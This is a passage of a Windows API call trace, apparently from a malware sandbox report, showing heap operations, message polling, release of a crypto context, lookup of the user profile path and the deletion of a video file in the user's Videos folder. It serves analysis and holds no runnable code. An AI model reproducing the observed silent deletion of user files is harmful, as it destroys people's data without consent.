hHeap=0x25c0000) returned 1 [0257.993] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.995] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.995] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.995] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.995] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.995] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.995] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.995] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.996] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0257.996] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.996] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.996] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.997] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.997] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.997] FreeLibrary (hLibModule=0x74d40000) returned 1 [0257.997] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.997] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.999] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.999] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.000] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.000] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.000] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0258.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/afvn6kbS8JsNZy6W_IRM.mp4", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\afvn6kbS8JsNZy6W_IRM.mp4", lpFilePart=0x8bedfc*="afvn6kbS8JsNZy6W_IRM.mp4") returned 0x3d [0258.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0258.002] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\afvn6kbS8JsNZy6W_IRM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\afvn6kbs8jsnzy6w_irm.mp4")) returned 0x20 [0258.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\afvn6kbS8JsNZy6W_IRM.mp4", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe301f10, ftCreationTime.dwHighDateTime=0x1d4cbb9, ftLastAccessTime.dwLowDateTime=0xc659db20, ftLastAccessTime.dwHighDateTime=0x1d4d047, ftLastWriteTime.dwLowDateTime=0xc659db20, ftLastWriteTime.dwHighDateTime=0x1d4d047, nFileSizeHigh=0x0, nFileSizeLow=0xc87b, dwReserved0=0x1816, dwReserved1=0x4, cFileName="afvn6kbS8JsNZy6W_IRM.mp4", cAlternateFileName="AFVN6K~1.MP4")) returned 0xaa57a0 [0258.002] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\afvn6kbS8JsNZy6W_IRM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\afvn6kbs8jsnzy6w_irm.mp4")) returned 1 [0258.004] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe301f10, ftCreationTime.dwHighDateTime=0x1d4cbb9, ftLastAccessTime.dwLowDateTime=0xc659db20, ftLastAccessTime.dwHighDateTime=0x1d4d047, ftLastWriteTime.dwLowDateTime=0xc659db20, ftLastWriteTime.dwHighDateTime=0x1d4d047, nFileSizeHigh=0x0, nFileSizeLow=0xc87b, dwReserved0=0x1816, dwReserved1=0x4, cFileName="afvn6kbS8JsNZy6W_IRM.mp4", cAlternateFileName="AFVN6K~1.MP4")) returned 0 [0258.004] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0258.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0258.005] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.005] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0258.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0258.007] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/afvn6kbS8JsNZy6W_IRM.mp4", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\afvn6kbS8JsNZy6W_IRM.mp4", lpFilePart=0x8bf658*="afvn6kbS8JsNZy6W_IRM.mp4") returned 0x3d [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0258.007] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\afvn6kbS8JsNZy6W_IRM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\afvn6kbs8jsnzy6w_irm.mp4")) returned 0xffffffff [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0258.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.008] RtlAllocateHeap 